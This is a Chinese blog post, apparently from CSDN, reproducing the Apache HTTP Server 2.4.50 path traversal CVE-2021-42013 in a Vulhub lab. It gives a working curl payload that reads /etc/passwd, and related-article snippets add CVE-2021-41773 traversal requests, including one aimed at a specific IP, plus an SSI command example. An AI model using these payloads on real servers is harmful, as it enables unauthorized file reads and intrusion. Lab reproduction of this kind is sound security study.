Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)

最新推荐文章于 2024-07-08 17:07:16 发布
最新推荐文章于 2024-07-08 17:07:16 发布
阅读量238 收藏
点赞数
文章标签: apache 服务器 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzz1284/article/details/128704688
版权

漏洞环境均基于Vulhub

原因

Apache HTTP 服务器项目致力于为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。

CVE-2021-42013 是由于CVE-2021-41773修复不完整而导致的漏洞,攻击者可以使用路径遍历攻击将 URL 映射到由 Alias-like 指令配置的目录之外的文件。

此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50,而不是更早的版本。

复现

Apache HTTP Server 2.4.50 修补了以前的 CVE-2021-41773 有效负载,例如http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,但它不完整。

用于.%%32%65绕过补丁(注意/icons/必须是现有目录):

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

n1ght_X
关注
漏洞复现】Apache HTTP Server 2.4.49、2.4.50 RCE(CVE-2021-41773)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-22 892
Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49的一个路径遍历文件泄露漏洞CVE-2021-41773)。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。
服务攻防-间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2788
ISS间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
Apache HTTP Server SSRF漏洞CVE-2021-40438)复现
2301_76467680的博客
07-09 430
拉取环境访问页面pocGET /?Win64;x64;q=0.3,en;成功页面。
Apache 修复 Apache HTTP Server 的源代码泄露漏洞
最新发布
smellycat000的专栏
07-08 270
聚焦源代码安全,网罗国内外最新资讯!作者:Pierluigi Paganini编译:代码卫士Apache 软件基金会修复了Apache HTTP Server 的多个漏洞,其包括拒绝服务 (DoS)、远程代码执行和越权访问等问题。其一个漏洞是严重的源代码披露漏洞,编号为CVE-2024-39884。安全公告提到,“Apache HTTP Server 2.4.60内核的回归忽视了句柄的基...
Apache HTTP Server漏洞CVE-2021-41773)
weixin_44769042的博客
10-26 5881
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
Apache HTTP Server 安全漏洞CVE-2019-0211)加固指南
乐大厨串串香飘万里
10-11 1477
安全漏洞
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
MateSnake的博客
05-29 1313
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1434
发现对 Apache HTTP 服务器 2.4.50 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
Apache HTTP Server 2.4.50 路径遍历文件泄露漏洞 (CVE-2021-42013)实验报告
weixin_48400575的博客
02-19 4267
Apache HTTP Server 2.4.50 路径遍历文件泄露漏洞 (CVE-2021-42013)复现实验报告
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3971
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
CVE-2021-42013Apache HTTP Server目录遍历漏洞
weixin_47179815的博客
07-13 2873
漏洞是由于在Apache HTTP Server 2.4.50版本CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器一些文件,进而造成敏感信息泄露。若httpd开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202
文件操作安全之-目录穿越原理篇
村中少年的专栏
10-12 2279
从目录穿越的定义,目录穿越的漏洞原理,目录穿越漏洞的具体案例,例如Apache http服务器CVE-2021-41773和CVE-2021-42013目录穿越漏洞,以及目录穿越漏洞潜在的危害阐述目录穿越漏洞安全问题。
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_44047654的博客
12-07 770
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
LiBai'S BLOG
11-13 8921
https://66.175.213.123/etc/passwd 请求包 GET https://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 66.175.213.123 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,applica
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3259
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
CVE-2021-42013  Apache HTTP Server 路径穿越漏洞
蚁景网安学院
03-03 2720
前言CVE-2021-42013为目录穿越文件读取漏洞,影响 httpd 2.4.49,CVE编号为CVE-2021-41773, https 2.4.50不完全修复可绕过,如果开启 mo...
apache httpd漏洞合集
weixin_46626737的博客
07-02 704
就是上传文件,在1.php文件名后面加一个0x0ahex值进行一个绕过,恰好有解析漏洞,将1.php%0a当做1.php执行。--#exec cmd="id" -->,直接访问,就会显示。3.Apache HTTP Server路径穿越漏洞(CVE-2021-41773、CVE-2021-42013)上传文件,bp抓包修改为123.php.jpg,访问其路径,会以php格式执行。漏洞版本:Apache HTTP Server 2.4.49-2.4.50漏洞版本:通用,得看是否开启了ssi组件。
CVE-2021-42013 漏洞复现
Jay17的博客
02-10 569
CVE-2021-42013 漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值